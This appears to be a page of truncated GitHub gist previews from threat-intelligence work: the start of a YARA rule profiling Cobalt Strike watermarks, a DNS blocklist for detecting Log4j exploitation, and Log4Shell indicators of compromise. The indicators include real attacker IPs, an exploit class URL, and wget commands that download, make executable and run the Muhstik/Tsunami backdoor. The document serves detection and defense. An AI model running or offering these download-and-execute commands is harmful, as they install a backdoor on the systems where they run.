This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Must have console module via yara-4.2.0-rc1+ | |
// expects decoded beacons | |
import "pe" | |
import "console" | |
rule CobaltStrike_Watermark_Profiler: Profiler | |
{ | |
meta: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
############################################################################ | |
# RPZ to detect internal exploitation of Log4j | |
############################################################################ | |
# Joint work @craiu https://twitter.com/craiu | |
# https://github.com/craiu/iocs/blob/main/log4shell/log4j_blocklist.txt | |
############################################################################ | |
dnspod.cn | |
bingsearchlib.com | |
interactsh.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
45.130.229.168:1389/Exploit.class | |
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b | |
--> curl http://18.228.7.109/.log/log | |
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b | |
--> Download of Muhstik/Tsunami Backdoor | |
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 & | |
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 & | |
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 & |